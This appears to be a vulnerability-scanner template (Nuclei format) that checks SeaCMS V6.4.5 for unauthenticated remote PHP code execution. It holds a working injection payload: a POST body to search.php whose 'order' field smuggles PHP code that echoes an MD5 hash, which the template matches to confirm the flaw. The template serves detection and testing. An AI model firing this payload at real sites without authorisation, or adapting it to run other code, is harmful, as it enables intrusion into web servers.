id: seacms-rce info: name: SeaCMS V6.4.5 RCE author: pikpikcu severity: high description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. reference: - https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce metadata: max-request: 1 http: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' body: "searchtype=5&order=}{end if} {if:1)echo md5('seacms');if(1}{end if}" matchers-condition: and matchers: - type: word part: body words: - "b1e597fa44dfd7669966bfab04eeb8ea" - type: status status: - 200